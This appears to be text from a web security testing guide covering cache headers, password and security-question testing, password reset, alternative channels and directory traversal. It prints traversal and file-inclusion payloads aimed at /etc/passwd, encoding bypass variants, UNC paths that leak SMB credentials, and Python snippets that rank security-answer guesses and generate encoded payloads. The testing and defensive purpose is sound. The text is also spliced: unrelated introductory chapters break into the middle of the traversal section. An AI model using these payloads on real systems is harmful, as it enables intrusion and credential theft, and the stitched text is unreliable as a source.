Such a directive can be issued in the HTTP response headers with the following directives:</p><p>https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.13</p><p>Cache-Control: no-cache, no-store</p><p>Expires: 0</p><p>Pragma: no-cache</p><p>These directives are generally robust, although additional flags may be necessary for the Cache-Control header in order to better prevent persistently linked files on the file system. These include:</p><p>Cache-Control: must-revalidate, max-age=0, s-maxage=0</p><p>HTTP/1.1:</p><p>Cache-Control: no-cache</p><p>HTTP/1.0:</p><p>Pragma: no-cache</p><p>Expires: <past date or illegal value (e.g., 0)></p><p>For instance, if testers are testing an e-commerce application, they should look for all pages that contain a credit card number or some other financial information, and check that all those pages enforce the no-cache directive. If they find pages that contain critical information but that fail to instruct the browser not to cache their content, they know that sensitive information will be stored on the disk, and they can double-check this simply by looking for the page in the browser cache.</p><p>The exact location where that information is stored depends on the client operating system and on the browser that has been used. Here are some examples:</p><p>Mozilla Firefox:</p><p>Unix/Linux: ~/.cache/mozilla/firefox/</p><p>Windows: C:\Users\<user_name>\AppData\Local\Mozilla\Firefox\Profiles\<profile-id>\Cache2\</p><p>Internet Explorer:</p><p>C:\Users\<user_name>\AppData\Local\Microsoft\Windows\INetCache\</p><p>Chrome:</p><p>Windows: C:\Users\<user_name>\AppData\Local\Google\Chrome\User Data\Default\Cache</p><p>Unix/Linux: ~/.cache/google-chrome</p><p>Reviewing Cached Information</p><p>Firefox provides functionality for viewing cached information, which may be to your benefit as a tester.
Of course, the industry has also produced various extensions and external apps which you may prefer or need for Chrome, Internet Explorer, or Edge.</p><p>Cache details are also available via developer tools in most modern browsers, such as Firefox, Chrome, and Edge. With Firefox it is also possible to use the URL about:cache to check cache details.</p><p>Check Handling for Mobile Browsers</p><p>Handling of cache directives may be completely different for mobile browsers. Therefore, testers should start a new browsing session with clean caches and take advantage of features like Chrome's Device Mode or Firefox's Responsive Design Mode to re-test or separately test the concepts outlined above.</p><p>Additionally, personal proxies such as ZAP and Burp Suite allow the tester to specify which User-Agent should be sent by their spiders/crawlers. This could be set to match a mobile browser User-Agent string and used to see which caching directives are sent by the application being tested.</p><p>Gray-Box Testing</p><p>https://developer.mozilla.org/en-US/docs/Tools/Storage_Inspector#Cache_Storage</p><p>https://developers.google.com/web/tools/chrome-devtools/storage/cache</p><p>https://developers.google.com/web/tools/chrome-devtools/device-mode</p><p>https://developer.mozilla.org/en-US/docs/Tools/Responsive_Design_Mode</p><p>The methodology for testing is equivalent to the black-box case, as in both scenarios testers have full access to the server response headers and to the HTML code.
However, with gray-box testing, the tester may have access to account credentials that will allow them to test sensitive pages that are accessible only to authenticated users.</p><p>Tools</p><p>OWASP Zed Attack Proxy</p><p>References</p><p>Whitepapers</p><p>Caching in HTTP</p><p>https://www.zaproxy.org/</p><p>https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html</p><p>Testing for Weak Password Policy</p><p>ID</p><p>WSTG-ATHN-07</p><p>Summary</p><p>The most prevalent and most easily administered authentication mechanism is a static password. The password represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high profile hacks that have revealed user credentials, it is lamented that most common passwords are still: 123456, password and qwerty.</p><p>Test Objectives</p><p>Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords.</p><p>How to Test</p><p>1. What characters are permitted and forbidden for use within a password? Is the user required to use characters from different character sets such as lower and uppercase letters, digits and special symbols?</p><p>2. How often can a user change their password? How quickly can a user change their password after a previous change? Users may bypass password history requirements by changing their password 5 times in a row so that after the last password change they have configured their initial password again.</p><p>3. When must a user change their password? Both NIST and NCSC recommend against forcing regular password expiry, although it may be required by standards such as PCI DSS.</p><p>4. How often can a user reuse a password?
Does the application maintain a history of the user's previous 8 passwords?</p><p>5. How different must the next password be from the last password?</p><p>6. Is the user prevented from using their username or other account information (such as first or last name) in the password?</p><p>7. What are the minimum and maximum password lengths that can be set, and are they appropriate for the sensitivity of the account and application?</p><p>8. Is it possible to set common passwords such as Password1 or 123456?</p><p>References</p><p>Brute Force Attacks</p><p>Remediation</p><p>To mitigate the risk of easily guessed passwords facilitating unauthorized access there are two solutions: introduce additional authentication controls (i.e. two-factor authentication) or introduce a strong password policy. The simplest and cheapest of these is the introduction of a strong password policy that ensures password length, complexity, reuse and aging; although ideally both of them should be implemented.</p><p>https://pages.nist.gov/800-63-3/sp800-63b.html#memsecretver</p><p>https://www.ncsc.gov.uk/collection/passwords/updating-your-approach#PasswordGuidance:UpdatingYourApproach-Don'tenforceregularpasswordexpiry</p><p>https://owasp.org/www-community/attacks/Brute_force_attack</p><p>Testing for Weak Security Question Answer</p><p>ID</p><p>WSTG-ATHN-08</p><p>Summary</p><p>Often called "secret" questions and answers, security questions and answers are often used to recover forgotten passwords (see Testing for Weak Password Change or Reset Functionalities), or as extra security on top of the password. They are typically generated upon account creation and require the user to select from some pre-generated questions and supply an appropriate answer. They may allow the user to generate their own question and answer pairs.
Both methods are prone to insecurities. Ideally, security questions should generate answers that are only known by the user, and not guessable or discoverable by anybody else. This is harder than it sounds. Security questions and answers rely on the secrecy of the answer. Questions and answers should be chosen so that the answers are only known by the account holder. However, although a lot of answers may not be publicly known, most of the questions that websites implement promote answers that are pseudo-private.</p><p>Pre-generated Questions</p><p>The majority of pre-generated questions are fairly simplistic in nature and can lead to insecure answers. For example:</p><p>The answers may be known to family members or close friends of the user, e.g. "What is your mother's maiden name?", "What is your date of birth?"</p><p>The answers may be easily guessable, e.g. "What is your favorite color?", "What is your favorite baseball team?"</p><p>The answers may be brute forcible, e.g. "What is the first name of your favorite high school teacher?" - the answer is probably on some easily downloadable list of popular first names, and therefore a simple brute force attack can be scripted.</p><p>The answers may be publicly discoverable, e.g. "What is your favorite movie?" - the answer may easily be found on the user's social media profile page.</p><p>Self-generated Questions</p><p>The problem with having users generate their own questions is that it allows them to generate very insecure questions, or even bypass the whole point of having a security question in the first place.
Here are some real world examples that illustrate this point:</p><p>“What is 1+1?”</p><p>“What is your username?”</p><p>“My password is S3cur|ty!”</p><p>How to Test</p><p>Testing for Weak Pre-generated Questions</p><p>Try to obtain a list of security questions by creating a new account or by following the “I don’t remember my password” process. Try to generate as many questions as possible to get a good idea of the type of security questions that are asked. If any of the security questions fall into the categories described above, they are vulnerable to being attacked (guessed, brute-forced, available on social media, etc.).</p><p>Testing for Weak Self-Generated Questions</p><p>Try to create security questions by creating a new account or by configuring your existing account’s password recovery properties. If the system allows the user to generate their own security questions, it is vulnerable to having insecure questions created. If the system uses the self-generated security questions during the forgotten password functionality and if usernames can be enumerated (see Testing for Account Enumeration and Guessable User Account), then it should be easy for the tester to enumerate a number of self-generated questions. It should be expected to find several weak self-generated questions using this method.</p><p>Testing for Brute-forcible Answers</p><p>Use the methods described in Testing for Weak Lock Out Mechanism to determine if a number of incorrectly supplied security answers trigger a lockout mechanism.</p><p>The first thing to take into consideration when trying to exploit security questions is the number of questions that need to be answered.
The majority of applications only require the user to answer a single question, whereas some critical applications may require the user to answer two or even more questions.</p><p>The next step is to assess the strength of the security questions. Could the answers be obtained by a simple Google search or with a social engineering attack? As a penetration tester, here is a step-by-step walk-through of exploiting a security question scheme:</p><p>Does the application allow the end-user to choose the question that needs to be answered? If so, focus on questions which have:</p><p>A “public” answer; for example, something that could be found with a simple search-engine query.</p><p>A factual answer such as a “first school” or other facts which can be looked up.</p><p>Few possible answers, such as “what model was your first car”. These questions would present the attacker with a short list of possible answers, and based on statistics the attacker could rank answers from most to least likely.</p><p>Determine how many guesses you have if possible.</p><p>Does the password reset allow unlimited attempts?</p><p>Is there a lockout period after X incorrect answers? Keep in mind that a lockout system can be a security problem in itself, as it can be exploited by an attacker to launch a Denial of Service against legitimate users.</p><p>Pick the appropriate question based on analysis from the above points, and do research to determine the most likely answers.</p><p>The key to successfully exploiting and bypassing a weak security question scheme is to find a question or set of questions which give the possibility of easily finding the answers. Always look for questions which can give you the greatest statistical chance of guessing the correct answer, if you are completely unsure of any of the answers.
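The ranking step described above can be sketched in a few lines of Python; the candidate answers and frequency figures below are illustrative assumptions, not real statistics:

```python
# Sketch: ranking candidate answers for a short-answer-pool security question.
# The answer pool and weights are invented for illustration only.

def rank_answers(candidates):
    """Order (answer, assumed_frequency) pairs from most to least likely."""
    return sorted(candidates, key=lambda pair: pair[1], reverse=True)

# Hypothetical pool for "What model was your first car?"
first_car_guesses = [
    ("Golf", 0.04),
    ("Civic", 0.09),
    ("F-150", 0.06),
    ("Corolla", 0.08),
]

ordered = [model for model, _ in rank_answers(first_car_guesses)]
print(ordered)  # most promising guesses first
```

An attacker would then try the answers in this order, staying below any lockout threshold identified earlier.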
In the end, a security question scheme is only as strong as the weakest question.</p><p>References</p><p>The Curse of the Secret Question</p><p>The OWASP Security Questions Cheat Sheet</p><p>https://www.schneier.com/essay-081.html</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html</p><p>Testing for Weak Password Change or Reset Functionalities</p><p>ID</p><p>WSTG-ATHN-09</p><p>Summary</p><p>The password change and reset function of an application is a self-service password change or reset mechanism for users. This self-service mechanism allows users to quickly change or reset their password without an administrator intervening. When passwords are changed they are typically changed within the application. When passwords are reset they are either rendered within the application or emailed to the user. This may indicate that the passwords are stored in plain text or in a decryptable format.</p><p>Test Objectives</p><p>1. Determine the resistance of the application to subversion of the account change process allowing someone to change the password of an account.</p><p>2. Determine the resistance of the password reset functionality against guessing or bypassing.</p><p>How to Test</p><p>For both password change and password reset it is important to check:</p><p>1. if users, other than administrators, can change or reset passwords for accounts other than their own.</p><p>2. if users can manipulate or subvert the password change or reset process to change or reset the password of another user or administrator.</p><p>3. if the password change or reset process is vulnerable to CSRF.</p><p>Test Password Reset</p><p>In addition to the previous checks it is important to verify the following:</p><p>What information is required to reset the password?</p><p>The first step is to check whether secret questions are required.
Sending the password (or a password reset link) to the user’s email address without first asking for a secret question means relying 100% on the security of that email address, which is not suitable if the application needs a high level of security. On the other hand, if secret questions are used, the next step is to assess their strength. This specific test is discussed in detail in the Testing for Weak Security Question Answer paragraph of this guide.</p><p>How are reset passwords communicated to the user? The most insecure scenario here is if the password reset tool shows you the password; this gives the attacker the ability to log into the account, and unless the application provides information about the last log in, the victim would not know that their account has been compromised. A less insecure scenario is if the password reset tool forces the user to immediately change their password. While not as stealthy as the first case, it allows the attacker to gain access and locks the real user out.</p><p>The best security is achieved if the password reset is done via an email to the address the user initially registered with, or some other email address; this forces the attacker to not only guess at which email account the password reset was sent to (unless the application shows this information) but also to compromise that email account in order to obtain the temporary password or the password reset link.</p><p>Are reset passwords generated randomly?
The most insecure scenario here is if the application sends or displays the old password in clear text, because this means that passwords are not stored in a hashed form, which is a security issue in itself.</p><p>The best security is achieved if passwords are randomly generated with a secure algorithm that cannot be derived.</p><p>Does the reset password functionality request confirmation before changing the password? To limit denial-of-service attacks the application should email a link to the user with a random token, and complete the reset procedure only if the user visits the link. This ensures that the current password will still be valid until the reset has been confirmed.</p><p>Test Password Change</p><p>In addition to the previous test it is important to verify:</p><p>Is the old password requested to complete the change?</p><p>The most insecure scenario here is if the application permits the change of the password without requesting the current password. Indeed, if an attacker is able to take control of a valid session they could easily change the victim’s password.
See also the Testing for Weak Password Policy paragraph of this guide.</p><p>References</p><p>OWASP Forgot Password Cheat Sheet</p><p>Remediation</p><p>The password change or reset function is a sensitive function and requires some form of protection, such as requiring users to re-authenticate or presenting the user with confirmation screens during the process.</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html</p><p>Testing for Weaker Authentication in Alternative Channel</p><p>ID</p><p>WSTG-ATHN-10</p><p>Summary</p><p>Even if the primary authentication mechanisms do not include any vulnerabilities, it may be that vulnerabilities exist in alternative legitimate authentication user channels for the same user accounts. Tests should be undertaken to identify alternative channels and, subject to test scoping, identify vulnerabilities.</p><p>The alternative user interaction channels could be utilized to circumvent the primary channel, or expose information that can then be used to assist an attack against the primary channel. Some of these channels may themselves be separate web applications using different host names or paths. For example:</p><p>Standard website</p><p>Mobile, or specific device, optimized website</p><p>Accessibility optimized website</p><p>Alternative country and language websites</p><p>Parallel websites that utilize the same user accounts (e.g.
another website of the same organization offering different functionality, a partner website with which user accounts are shared)</p><p>Development, test, UAT and staging versions of the standard website</p><p>But they could also be other types of application or business processes:</p><p>Mobile device app</p><p>Desktop application</p><p>Call center operators</p><p>Interactive voice response or phone tree systems</p><p>Note that the focus of this test is on alternative channels; some authentication alternatives might appear as different content delivered via the same website and would almost certainly be in scope for testing. These are not discussed further here, and should have been identified during information gathering and primary authentication testing. For example:</p><p>Progressive enrichment and graceful degradation that change functionality</p><p>Site use without cookies</p><p>Site use without JavaScript</p><p>Site use without plugins such as Flash and Java</p><p>Even if the scope of the test does not allow the alternative channels to be tested, their existence should be documented. These may undermine the degree of assurance in the authentication mechanisms and may be a precursor to additional testing.</p><p>Example</p><p>The primary website is:</p><p>http://www.example.com</p><p>and authentication functions always take place on pages using Transport Layer Security:</p><p>https://www.example.com/myaccount/</p><p>However, a separate mobile-optimized website exists that does not use Transport Layer Security at all, and has a weaker password recovery mechanism:</p><p>http://m.example.com/myaccount/</p><p>How to Test</p><p>Understand the Primary Mechanism</p><p>Fully test the website’s primary authentication functions. This should identify how accounts are issued, created or changed and how passwords are recovered, reset, or changed.
Additionally, any elevated privilege authentication and authentication protection measures should be identified. These precursors are necessary to be able to compare with any alternative channels.</p><p>Identify Other Channels</p><p>Other channels can be found by using the following methods:</p><p>Reading site content, especially the home page, contact us, help pages, support articles and FAQs, T&Cs, privacy notices, the robots.txt file and any sitemap.xml files.</p><p>Searching HTTP proxy logs, recorded during previous information gathering and testing, for strings such as “mobile”, “android”, “blackberry”, “ipad”, “iphone”, “mobile app”, “e-reader”, “wireless”, “auth”, “sso”, “single sign on” in URL paths and body content.</p><p>Use search engines to find different websites from the same organization, or using the same domain name, that have similar home page content or which also have authentication mechanisms.</p><p>For each possible channel confirm whether user accounts are shared across these, or provide access to the same or similar functionality.</p><p>Enumerate Authentication Functionality</p><p>For each alternative channel where user accounts or functionality are shared, identify if all the authentication functions of the primary channel are available, and if anything extra exists. It may be useful to create a grid like the one below:</p><p>Function | Primary | Mobile | Call Center | Partner Website</p><p>Register | Yes | - | - | -</p><p>Log in | Yes | Yes | Yes | Yes (SSO)</p><p>Log out | - | - | - | -</p><p>Password reset | Yes | Yes | Yes | -</p><p>Change password | - | Yes | - | -</p><p>In this example, mobile has an extra function “change password” but does not offer “log out”. A limited number of tasks are also possible by phoning the call center.
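The grid above can also be captured in code to flag functions that exist on an alternative channel but are missing from the primary one; this is a minimal sketch using the example data, and the function name is illustrative:

```python
# Sketch: representing the channel/function grid and flagging functions that an
# alternative channel offers but the primary channel does not.
channels = {
    "primary": {"register", "log in", "password reset"},
    "mobile": {"log in", "password reset", "change password"},
}

def extra_functions(channels, baseline="primary"):
    """Functions offered by each alternative channel but absent from baseline."""
    base = channels[baseline]
    return {
        name: sorted(funcs - base)
        for name, funcs in channels.items()
        if name != baseline and funcs - base
    }

print(extra_functions(channels))  # {'mobile': ['change password']}
```

Any function flagged this way deserves its own authentication testing, since it has no primary-channel counterpart to compare against.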
Call centers can be interesting, because their identity confirmation checks might be weaker than the website’s, allowing this channel to be used to aid an attack against a user’s account.</p><p>While enumerating these it is worth taking note of how session management is undertaken, in case there is overlap across any channels (e.g. cookies scoped to the same parent domain name, concurrent sessions allowed across channels, but not on the same channel).</p><p>Review and Test</p><p>Alternative channels should be mentioned in the testing report, even if they are marked as “information only” or “out of scope”. In some cases the test scope might include the alternative channel (e.g. because it is just another path on the target host name), or may be added to the scope after discussion with the owners of all the channels. If testing is permitted and authorized, all the other authentication tests in this guide should then be performed, and compared against the primary channel.</p><p>Related Test Cases</p><p>The test cases for all the other authentication tests should be utilized.</p><p>Remediation</p><p>Ensure a consistent authentication policy is applied across all channels so that they are equally secure.</p><p>4.5 Authorization Testing</p><p>4.5.1 Testing Directory Traversal File Include</p><p>4.5.2 Testing for Bypassing Authorization Schema</p><p>4.5.3 Testing for Privilege Escalation</p><p>4.5.4 Testing for Insecure Direct Object References</p><p>Testing Directory Traversal File Include</p><p>ID</p><p>WSTG-ATHZ-01</p><p>Summary</p><p>Many web applications use and manage files as part of their daily operation.
By exploiting input validation methods that have not been well designed or deployed, an attacker could read or write files that are not intended to be accessible. In particular situations, it could be possible to execute arbitrary code or system commands.</p><p>Traditionally, web servers and web applications implement authentication mechanisms to control access to files and resources. Web servers try to confine users’ files inside a “root directory” or “web document root”, which represents a physical directory on the file system. Users have to consider this directory as the base directory of the hierarchical structure of the web application.</p><p>The definition of the privileges is made using Access Control Lists (ACLs) which identify which users or groups are supposed to be able to access, modify, or execute a specific file on the server. These mechanisms are designed to prevent malicious users from accessing sensitive files (for example, the common /etc/passwd file on a UNIX-like platform) or to avoid the execution of system commands.</p><p>Many web applications use server-side scripts to include different kinds of files. It is quite common to use this method to manage images, templates, load static texts, and so on. Unfortunately, these applications expose security vulnerabilities if input parameters (i.e., form parameters, cookie values) are not correctly validated.</p><p>In web servers and web applications, this kind of problem arises in path traversal/file include attacks.
By exploiting this kind of vulnerability, an attacker is able to read directories or files which they normally couldn’t read, access data outside the web document root, or include scripts and other kinds of files from external websites.</p><p>For the purpose of the OWASP Testing Guide, only the security threats related to web applications will be considered and not threats to web servers (e.g., the infamous “%5c escape code” in the Microsoft IIS web server). Further reading suggestions will be provided in the references section for interested readers.</p><p>This kind of attack is also known as the dot-dot-slash attack (../), directory traversal, directory climbing, or backtracking.</p><p>During an assessment, to discover path traversal and file include flaws, testers need to perform two different stages:</p><p>(a) Input Vectors Enumeration (a systematic evaluation of each input vector)</p><p>(b) Testing Techniques (a methodical evaluation of each attack technique used by an attacker to exploit the vulnerability)</p><p>How to Test</p><p>Black-Box Testing</p><p>Input Vectors Enumeration</p><p>In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user.
This also includes HTTP GET and POST queries and common options like file uploads and HTML forms.</p><p>Here are some examples of the checks to be performed at this stage:</p><p>Are there request parameters which could be used for file-related operations?</p><p>Are there unusual file extensions?</p><p>Are there interesting variable names?</p><p>http://example.com/getUserProfile.jsp?item=ikki.html</p><p>http://example.com/index.php?file=content</p><p>http://example.com/main.cgi?home=index.htm</p><p>Is it possible to identify cookies used by the web application for the dynamic generation of pages or templates?</p><p>Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower</p><p>Cookie: USER=1826cc8f:PSTYLE=GreenDotRed</p><p>Testing Techniques</p><p>The next stage of testing is analyzing the input validation functions present in the web application. Using the previous example, the dynamic page called getUserProfile.jsp loads static information from a file and shows the content to users.</p><p>An attacker could insert the malicious string “../../../../etc/passwd” to include the password file of a Linux/UNIX system. Obviously, this kind of attack is possible only if the validation checkpoint fails; according to the file system privileges, the web application itself must be able to read the file.</p><p>To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested.
There is no point requesting /etc/passwd from an IIS web server.</p><p>http://example.com/getUserProfile.jsp?item=../../../../etc/passwd</p><p>For the cookies example:</p><p>Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd</p><p>It’s also possible to include files and scripts located on an external website.</p><p>http://example.com/index.php?file=http://www.owasp.org/malicioustxt</p><p>If protocols are accepted as arguments, as in the above example, it’s also possible to probe the local filesystem this way.</p><p>http://example.com/index.php?file=file:///etc/passwd</p><p>If protocols are accepted as arguments, as in the above examples, it’s also possible to probe local and nearby services.</p><p>http://example.com/index.php?file=http://localhost:8080 or http://example.com/index.php?file=http://192.168.0.2:9080</p><p>The following example will demonstrate how it is possible to show the source code of a CGI component, without using any path traversal characters.</p><p>http://example.com/main.cgi?home=main.cgi</p><p>The component called “main.cgi” is located in the same directory as the normal HTML static files used by the application. In some cases the tester needs to encode the requests using special characters (like the “.” dot, “%00” null, …) in order to bypass file extension controls or to prevent script execution.</p><p>Tip: It’s a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content.
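To apply this tip systematically, a tester can pre-compute several encodings of the same traversal sequence and try each in turn; this is a minimal sketch matching the encoding variants listed in this section, and the helper names are illustrative:

```python
# Sketch: emitting the encoded traversal variants listed in this section so a
# tester can try each form when basic "../" filtering is in place.

def url_encode_all(s):
    """Percent-encode every byte, e.g. '../' -> '%2e%2e%2f'."""
    return "".join("%{:02x}".format(b) for b in s.encode())

def double_encode(s):
    """Re-encode the percent signs, e.g. '%2e%2e%2f' -> '%252e%252e%252f'."""
    return url_encode_all(s).replace("%", "%25")

payloads = {
    "plain": "../",
    "url": url_encode_all("../"),            # %2e%2e%2f
    "double_url": double_encode("../"),      # %252e%252e%252f
    "url_backslash": url_encode_all("..\\"), # %2e%2e%5c
}
for name, payload in payloads.items():
    print(name, payload)
```

If the plain form is filtered, each encoded form is tried against the same parameter.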
If at first the test string isn’t successful, try another encoding scheme.</p><p>Each operating system uses different characters as path separator:</p><p>Unix-like OS:</p><p>root directory: “ / “</p><p>directory separator: “ / “</p><p>Windows OS Shell:</p><p>root directory: “ <drive letter>:\ “</p><p>directory separator: “ \ “ or “ / “</p><p>Classic Mac OS:</p><p>root directory: “ <drive letter>: “</p><p>directory separator: “ : “</p><p>We should take into account the following character encoding mechanisms:</p><p>URL encoding and double URL encoding</p><p>%2e%2e%2f represents ../</p><p>%2e%2e/ represents ../</p><p>..%2f represents ../</p><p>%2e%2e%5c represents ..\</p><p>%2e%2e\ represents ..\</p><p>..%5c represents ..\</p><p>%252e%252e%255c represents ..\</p><p>..%255c represents ..\ and so on.</p><p>Unicode/UTF-8</p><p>such as the Gramm-Leach-Bliley Act, or from state laws, such as the California SB-1386.</p><p>For organizations based in EU countries, both country-specific regulation and EU Directives may apply. For example, Directive 95/46/EC makes it mandatory to treat personal data in applications with due care, whatever the application.</p><p>Develop the Right Mindset</p><p>Successfully testing an application for security vulnerabilities requires thinking “outside of the box.” Normal use cases will test the normal behavior of the application when a user is using it in the manner that is expected. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find any assumptions made by web developers that are not always true, and how those assumptions can be subverted.
One reason that automated tools do a poor job of testing for vulnerabilities is that automated tools do</p><p>not think creatively. Creative thinking must be done on a case-by-case basis, as most web applications are being</p><p>developed in a unique way (even when using common frameworks).</p><p>Understand the Subject</p><p>One of the first major initiatives in any good security program should be to require accurate documentation of the</p><p>application. The architecture, data-flow diagrams, use cases, etc, should be recorded in formal documents and made</p><p>available for review. The technical specification and application documents should include information that lists not</p><p>only the desired use cases, but also any specifically disallowed use cases. Finally, it is good to have at least a basic</p><p>security infrastructure that allows the monitoring and trending of attacks against an organization’s applications and</p><p>network (e.g., IDS systems).</p><p>Use the Right Tools</p><p>While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security</p><p>program. There is a range of open source and commercial tools that can automate many routine security tasks. These</p><p>tools can simplify and speed up the security process by assisting security personnel in their tasks. However, it is</p><p>important to understand exactly what these tools can and cannot do so that they are not oversold or used incorrectly.</p><p>The Devil is in the Details</p><p>It is critical not to perform a superficial security review of an application and consider it complete. This will instill a false</p><p>sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to</p><p>carefully review the findings and weed out any false positives that may remain in the report. 
Reporting an incorrect</p><p>security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify</p><p>that every possible section of application logic has been tested, and that every use case scenario was explored for</p><p>possible vulnerabilities.</p><p>Use Source Code When Available</p><p>While black-box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed</p><p>in a production environment, they are not the most effective or efficient way to secure an application. It is difficult for</p><p>dynamic testing to test the entire code base, particularly if many nested conditional statements exist. If the source code</p><p>for the application is available, it should be given to the security staff to assist them while performing their review. It is</p><p>possible to discover vulnerabilities within the application source that would be missed during a black-box engagement.</p><p>Develop Metrics</p><p>An important part of a good security program is the ability to determine if things are getting better. 
It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization.</p><p>Good metrics will show:</p><p>If more education and training are required;</p><p>If there is a particular security mechanism that is not clearly understood by the development team;</p><p>If the total number of security related problems being found each month is going down.</p><p>https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act</p><p>https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=200120020SB1386</p><p>https://ec.europa.eu/info/policies/justice-and-fundamental-rights_en</p><p>Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations is a good starting point.</p><p>Document the Test Results</p><p>To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they were performed, and details of the test findings. It is wise to agree on an acceptable format for the report that is useful to all concerned parties, which may include developers, project management, business owners, IT department, audit, and compliance.</p><p>The report should clearly identify to the business owner where material risks exist, and do so in a manner sufficient to get their backing for subsequent mitigation actions.
The report should also be clear to the developer in pin-pointing the</p><p>exact function that is affected by the vulnerability and associated recommendations for resolving issues in a language</p><p>that the developer will understand. The report should also allow another security tester to reproduce the results. Writing</p><p>the report should not be overly burdensome on the security tester themselves. Security testers are not generally</p><p>renowned for their creative writing skills, and agreeing on a complex report can lead to instances where test results are</p><p>not properly documented. Using a security test report template can save time and ensure that results are documented</p><p>accurately and consistently, and are in a format that is suitable for the audience.</p><p>Testing Techniques Explained</p><p>This section presents a high-level overview of various testing techniques that can be employed when building a testing</p><p>program. It does not present specific methodologies for these techniques, as this information is covered in Chapter 3.</p><p>This section is included to provide context for the framework presented in the next chapter and to highlight the</p><p>advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover:</p><p>Manual Inspections & Reviews</p><p>Threat Modeling</p><p>Code Review</p><p>Penetration Testing</p><p>Manual Inspections and Reviews</p><p>Overview</p><p>Manual inspections are human reviews that typically test the security implications of people, policies, and processes.</p><p>Manual inspections can also include inspection of technology decisions such as architectural designs. They are</p><p>usually conducted by analyzing documentation or performing interviews with the designers or system owners.</p><p>While the concept of manual inspections and human reviews is simple, they can be among the most powerful and</p><p>effective techniques available. 
By asking someone how something works and why it was implemented in a specific way, the tester can quickly determine if any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place.</p><p>As with many things in life, when conducting manual inspections and reviews it is recommended that a trust-but-verify model is adopted. Not everything that the tester is shown or told will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application.</p><p>Unicode/UTF-8 encoding (it only works in systems that are able to accept overlong UTF-8 sequences)</p><p>..%c0%af represents ../</p><p>..%c1%9c represents ..\</p><p>There are other OS and application framework specific considerations as well. For instance, Windows is flexible in its parsing of file paths.</p><p>Windows shell: Appending any of the following to paths used in a shell command results in no difference in function:</p><p>Angle brackets “>” and “<” at the end of the path</p><p>Double quotes (closed properly) at the end of the path</p><p>Extraneous current directory markers such as “./” or “.\”</p><p>Extraneous parent directory markers with arbitrary items that may or may not exist. Examples:</p><p>file.txt</p><p>file.txt...</p><p>file.txt<spaces></p><p>file.txt””””</p><p>file.txt<<<>>><</p><p>./././file.txt</p><p>nonexistant/../file.txt</p><p>Windows API: The following items are discarded when used in any shell command or API call where a string is taken as a filename:</p><p>periods</p><p>spaces</p><p>Windows UNC Filepaths: Used to reference files on SMB shares.
Sometimes, an application can be made to refer</p><p>to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which</p><p>can be captured and cracked. These may also be used with a self-referential IP address or domain name to evade</p><p>filters, or used to access files on SMB shares inaccessible to the attacker, but accessible from the web server.</p><p>\\server_or_ip\path\to\file.abc</p><p>\\?\server_or_ip\path\to\file.abc</p><p>Windows NT Device Namespace: Used to refer to the Windows device namespace. Certain references will allow</p><p>access to file systems using a different path.</p><p>May be equivalent to a drive letter such as c:\ , or even a drive volume without an assigned letter.</p><p>\\.\GLOBALROOT\Device\HarddiskVolume1\</p><p>Refers to the first disc drive on the machine. \\.\CdRom0\</p><p>Gray-Box Testing</p><p>When the analysis is performed with a gray-box testing approach, testers have to follow the same methodology as in</p><p>black-box testing. However, since they can review the source code, it is possible to search the input vectors (stage (a)</p><p>of the testing) more easily and accurately. 
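</p><p>One way to search the input vectors in source is to script the search itself. The sketch below is a minimal illustration (the sample PHP source and function name are hypothetical), applying the same kind of pattern described in this section to flag inclusion calls fed directly from request input:</p><p>

```python
import re

# Pattern adapted from the search query shown in this section:
# PHP inclusion functions whose argument comes straight from
# $_GET, $_POST, or $_COOKIE.
RISKY_INCLUDE = re.compile(
    r"""(include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)"""
)

def flag_risky_lines(source: str) -> list:
    """Return the lines of a PHP source string matching the risky pattern."""
    return [line for line in source.splitlines() if RISKY_INCLUDE.search(line)]

sample = 'include($_GET["page"]);\n$path = "/static/header.php";\ninclude($path);'
print(flag_risky_lines(sample))  # -> ['include($_GET["page"]);']
```

</p><p>Lines using a local variable (such as the include($path) call above) are not flagged, which is exactly why a reviewer must still trace where such variables originate.</p><p>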
